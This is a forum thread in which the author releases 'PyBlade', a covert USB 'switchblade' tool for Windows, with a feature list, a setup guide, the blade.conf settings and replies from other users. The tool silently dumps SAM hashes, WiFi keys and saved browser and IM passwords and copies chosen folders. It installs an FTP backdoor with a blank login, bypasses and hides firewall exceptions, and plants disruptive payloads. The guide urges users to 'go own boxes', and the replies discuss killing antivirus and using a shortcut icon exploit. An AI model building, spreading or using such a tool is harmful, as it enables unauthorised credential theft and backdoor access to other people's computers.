92 replies to this topic

[sablefoxx]

PyBlade v0.3

About:
Some people have been asking for an updated switchblade to run on Vista/7 computers so I thought I'd throw something together. It's a work in progress, I'm also fairly new to Python so no making fun of my code Please download and report bugs or requested features!

Current Abilities:
-Gathers system info, running processes, and local IP settings
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)
-Keyboard Randomizer payload
-Landmine payload
-Emo Computer payload
-Rick Roll payload
-IE Homepage payload
-Save logs in .txt, .html, or .xml format
-U3 support via .u3p file
-Support for file slurping
-FTP backdoor installer (w/ XP Firewall bypass)


Planned Updates:
-Netcat backdoor installer
-AV Bypass / Evade
-Save all logs in .html / .xml format

Downloads:
PyBlade v0.3 ==> md5: a9b10c99eb2f2ecbabefb0f908a1e3bf
PyBlade Source Code v0.3 (Includes payloads' source code)
U3 Support (.u3p) *BETA*

*** Change Log ***

v0.1
-Gathers system info, running processes, and network connections
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)

v0.2
-Added Keyboard Randomizer payload
-Added Landmine payload
-Added Change IE homepage payload
-Added comments to code
-Changed sysinfo to collect local IP settings
-Added options to save logs as .txt, .html, or .xml
-Added U3 support
-Checks to see if Firefox is installed before dumping passwords


v0.3
-Added Emo Computer payload (harmless don't worry)
-Added Random Rick Roll payload
-Added support for file slurping
-Added icons for .exe's
-Added FTP Server backdoor
-Correctly sets file extensions when saving logs in .html/.xml
-Added ability to bypass XP Firewall, and hide exceptions from the GUI
-Added time stamps to log directories

*** Quick Setup Guide ***

Setup for Non-U3 Drives:
0. Obtain a USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract then copy the contents of PyBlade.rar to the root of your USB drive
3. Edit blade.conf to do your bidding (see below)
4. Go own boxes

Setup for Unmodified U3 Drives:
0. Obtain a U3 USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract then copy the contents of PyBlade.rar to the root the flash partition on the U3 drive
3. Edit blade.conf to do your bidding (see below)
4. Download F_Bex.u3p (see above)
5. Open the U3 menu, click "Add Programs" and "Install from My Computer"
6. Select F_Bex.u3p, and set it to automatically run when the drive is inserted
7. Go own boxes

Configure Your Blade:
1. Open "blade.conf" in your favorite text editor (or notepad)
2. Enable/Disable programs by changing their execute value (Enable = 1)
Here are the default settings for v0.3:

CODE

# --------------------------------
#  SwitchBlade Configuration File
# --------------------------------

# Log File Type
#   Possible values; text, html, xml
log=html

# System Dumps
sysinfo=1
pwdump=1
wifi=1
mspass=1
iepw=1
iehist=1
ffpw=1
chromepw=1

# Payloads
keyrand=0
landmine=0
rickroll=0
emo=0

# Change IE Homepage
iehome=0
iehome_url=http://google.com

# Backdoors
ftpme=0


# File Slurping
#   Seperate multiple directories using;'s
slurp=0
slurp_dirs=C:\Files;C:\Files2

Note that lines starting with '#' are comments, and are ignored during execution, do NOT comment out lines to disable programs, just set their execute value to 0

3. Some lines contain strings;
logs= Change this to set how the log files are saved (.log, .html, .xml)
iehome_url= If the IE Homepage payload is enabled (iehome=1), this is the URL that the homepage will be set to.
slurp_dirs= This is a list of the directories you want copied onto your drive, you can list multiple directories by separating them with semicolons
4. To manually execute run "bex.exe"

Payloads:
Keyboard Randomizer: This program randomizes all keyboard input while its running (keyrand).
Landmine: Selects a key at random and forcefully turns off the computer when it's pressed (landmine).
Emo Computer: The computer becomes sad and pretends to delete all the files on the computer (emo).
FTPme: Installs an FTP server on the root of the C: drive with a blank username/password (ftpme).
Random Rick Roller: Will open up rick rolls at random time intervals (rickroll).
Note: All payloads are activated on reboot (except for FTPme).

Let me know if you find bugs, and come say hi on IRC!

Edited by sablefoxx, 23 August 2010 - 12:19 PM.

[okiwan]

wow you wernt joking. your the man! cant wait to try it out.
THANKS!

[sablefoxx]

Whoops, forgot a file you may want to re-download it, also just found a couple bugs, working on a fixes.


Edit --Fixed problems!

Edited by sablefoxx, 23 September 2010 - 08:08 PM.

[Jen]

I thought it stopped things from autorunning with .inf?

[sablefoxx]

I thought it stopped things from autorunning with .inf?

It should still work on XP, I'm working on getting the new .lnk icon exploit to run it on unpatched Vista/Seven computers, and U3 support.

Edited by sablefoxx, 11 August 2010 - 10:37 AM.

[m1k]

Well done Batman !!

[Zimmer]

Nice!

[misfitsman805]

Nice! Keep up the good work man! Can't wait for future versions! XD

[IrishFavor]

so far looks great. thank you for all the work on this project.

[m1k]

It works on XP...
any Vista,Seven reports?

[xantos_gambit]

Pretty cool, needs a AV killer or something, most AVs destroy it before it gets a chance to do anything useful/

[sablefoxx]

Updated to v0.2, added payloads, and some other small stuff.

Pretty cool, needs a AV killer or something, most AVs destroy it before it gets a chance to do anything useful/

Hmm... I have yet to see this done well, perhaps I'll try something.

I could easily add an encrypted .rar where the files in question could be stored until after the AV has been killed or disabled.
"bex.exe" shouldn't be flagged VirusTotal

The problem is that killing AV software isn't as simple as making a taskkill system call, but perhaps we can disable it or crash it (without crashing the OS). The problem with this method is that we can only target specific titles.

Edited by sablefoxx, 16 August 2010 - 10:09 PM.

[Mr. Stuky]

Sorry for my noobness, but can you make a tutorial how to use these scripts? And hwo to make it work with U3 FlashDrive. thanks and I do apologize for my ignorance on this awesome software. Thanks. Good Job Batman

[sablefoxx]

Sorry for my noobness, but can you make a tutorial how to use these scripts? And hwo to make it work with U3 FlashDrive. thanks and I do apologize for my ignorance on this awesome software. Thanks. Good Job Batman

I'll throw something together, brb.

[Mr. Stuky]

Thanks, Really appreciated. Btw Added you so we can TF2 Sometime. ;]

[Jen]

I noticed you removed the .ink icon exploit as part of your planned features. Is it impossible to impliment it?

[sablefoxx]

I noticed you removed the .ink icon exploit as part of your planned features. Is it impossible to implement it?

More difficult then originally anticipated, may add it later.

[m1k]

Antivirus disabling....
also if my Avira dosn't see anything....

[w1ldf1re]

Awesome that you're now using Python!
I've been doing a course in it at university and it's nice to be able to see what you're doing in your programs and to be able to fix any errors that I get.

Hope I can contribute at some stage.

[w1ldf1re]

(delete)

Edited by w1ldf1re, 17 August 2010 - 02:55 PM.